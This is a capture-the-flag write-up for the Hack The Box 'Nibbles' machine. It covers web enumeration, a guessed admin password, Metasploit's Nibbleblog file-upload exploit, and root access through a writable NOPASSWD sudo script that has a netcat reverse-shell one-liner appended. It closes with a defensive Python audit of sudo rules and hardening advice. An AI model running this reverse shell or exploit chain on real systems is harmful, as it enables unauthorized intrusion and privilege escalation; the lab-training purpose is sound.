HTB | Nibbles

This box is on the Hack The Box Linux Privilege Escalation 101 track. Find the box here.

Skills Learned

  • Enumerating web applications

  • Guessing probable passwords

NMAP

IP: 10.10.10.75

nmap -sT -p- --min-rate 10000 10.10.10.75
nmap -sC -sV -p 22,80 10.10.10.75
[screenshot: nmap scan]

Port 80

Let's visit port 80.

[screenshot: port 80]

dirsearch found nothing at the web root.

[screenshot: dirsearch]

Looking at the page source, we found /nibbleblog/.

[screenshot: /nibbleblog/]

Let's fuzz that directory.

dirsearch -u http://10.10.10.75/nibbleblog/ -x 404,403
[screenshot: dirsearch]

This turned up http://10.10.10.75/nibbleblog/content/private/users.xml, which exposes the admin username.

[screenshot: /nibbleblog/content/private/users.xml]

Foothold/shell

Since we now have a username, let's try to log in at http://10.10.10.75/nibbleblog/admin.php.

[screenshot: /nibbleblog/admin.php]

I tried a bunch of passwords: admin:admin, admin:Nibble, admin:nibble, admin:nibbles.

The last one worked.

[screenshot: nibbleblog dashboard]

We also found http://10.10.10.75/nibbleblog/README, which reveals the Nibbleblog version.

[screenshot: /nibbleblog/README]

From here there are two ways to get a shell.

I used Metasploit; select the module and set the options as below.

use exploit/multi/http/nibbleblog_file_upload
set USERNAME admin
set PASSWORD nibbles
set RHOST 10.10.10.75
set RPORT 80
set TARGETURI /nibbleblog/

After running the exploit we had a shell and found user.txt.

[screenshot: user.txt]

Priv Esc

Running sudo -l shows that we can run /home/nibbler/personal/stuff/monitor.sh as root without a password.

[screenshot: sudo -l output]

Since we can run the script with sudo and the script itself is writable by our user, we can modify it to get root.

Let's append a reverse shell to monitor.sh (the listener is on 10.10.14.3:1234) and run the script with sudo.

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.3 1234 >/tmp/f" >> monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
[screenshot: root.txt]

We are root and found root.txt.
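The root step works only because a NOPASSWD sudo rule points at a script the same user can edit. The following audit is an added example written for this page (not part of the box, Metasploit, or any tool the writeup uses): it parses `sudo -l` output like the one shown above and reports NOPASSWD targets whose file or parent directory is writable by a non-root owner, group, or "other". The sample `sudo -l` text and the stand-in filesystem (uid 1001 standing for nibbler, an `/opt/backup.sh` owned by root) are constructed for the demo; on a real host you would pass the live `sudo -l` output with the default `os.stat`.

```python
"""Audit NOPASSWD sudo rules for targets a non-root user could rewrite.

Added example for this writeup, not the box's or any tool's own code.
Only the classic mode bits are checked; ACLs and capabilities are out of scope.
"""
import os
import re
import stat

# One rule line of `sudo -l` output, e.g.
#     (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+"   # (root) or (ALL : ALL)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"     # NOPASSWD:, SETENV:, ...
    r"(?P<cmds>.+)$"                 # one or more comma-separated commands
)


def parse_sudo_l(output):
    """Return a list of (runas, tags, command_path) tuples from `sudo -l` text."""
    rules = []
    for line in output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header lines such as "User x may run ..." are skipped
        tags = set(m.group("tags").replace(":", " ").split())
        for entry in m.group("cmds").split(","):
            words = entry.split()
            if words:  # first word is the path, the rest are fixed arguments
                rules.append((m.group("runas").strip(), tags, words[0]))
    return rules


def writable_by_non_root(st):
    """True if any uid/gid other than root could write through the mode bits."""
    m = st.st_mode
    return bool(
        (st.st_uid != 0 and m & stat.S_IWUSR)
        or (st.st_gid != 0 and m & stat.S_IWGRP)
        or m & stat.S_IWOTH
    )


def audit_sudo_rules(output, stat_fn=os.stat):
    """Return [(command, reason)] for NOPASSWD rules a non-root user could abuse."""
    findings = []
    for _runas, tags, cmd in parse_sudo_l(output):
        if "NOPASSWD" not in tags:
            continue
        if cmd == "ALL":
            findings.append((cmd, "unrestricted NOPASSWD"))
            continue
        try:
            st = stat_fn(cmd)
        except FileNotFoundError:
            findings.append((cmd, "target missing"))
            continue
        if writable_by_non_root(st):
            findings.append((cmd, "file writable by non-root"))
        # A writable parent directory lets the script be replaced wholesale.
        try:
            if writable_by_non_root(stat_fn(os.path.dirname(cmd))):
                findings.append((cmd, "parent directory writable by non-root"))
        except FileNotFoundError:
            pass
    return findings


# --- constructed demo data (stand-in for the box; uid 1001 plays nibbler) ---
def _fake_stat(mode, uid, gid):
    return os.stat_result((mode, 0, 0, 1, uid, gid, 0, 0, 0, 0))


FAKE_FS = {
    "/home/nibbler/personal/stuff": _fake_stat(stat.S_IFDIR | 0o755, 1001, 1001),
    "/home/nibbler/personal/stuff/monitor.sh": _fake_stat(stat.S_IFREG | 0o755, 1001, 1001),
    "/opt": _fake_stat(stat.S_IFDIR | 0o755, 0, 0),
    "/opt/backup.sh": _fake_stat(stat.S_IFREG | 0o755, 0, 0),  # root-owned: fine
}


def fake_stat(path):
    """os.stat replacement backed by the constructed FAKE_FS table."""
    if path not in FAKE_FS:
        raise FileNotFoundError(path)
    return FAKE_FS[path]


SAMPLE_SUDO_L = """\
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) NOPASSWD: /opt/backup.sh
    (root) NOPASSWD: /opt/missing.sh
"""

if __name__ == "__main__":
    for cmd, reason in audit_sudo_rules(SAMPLE_SUDO_L, stat_fn=fake_stat):
        print(f"{cmd}: {reason}")
```

The fix on the defending side is the mirror image of the finding: keep anything referenced by a NOPASSWD rule owned by root, mode 0755 or tighter, in a root-owned directory, so the user allowed to run it cannot change what runs.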
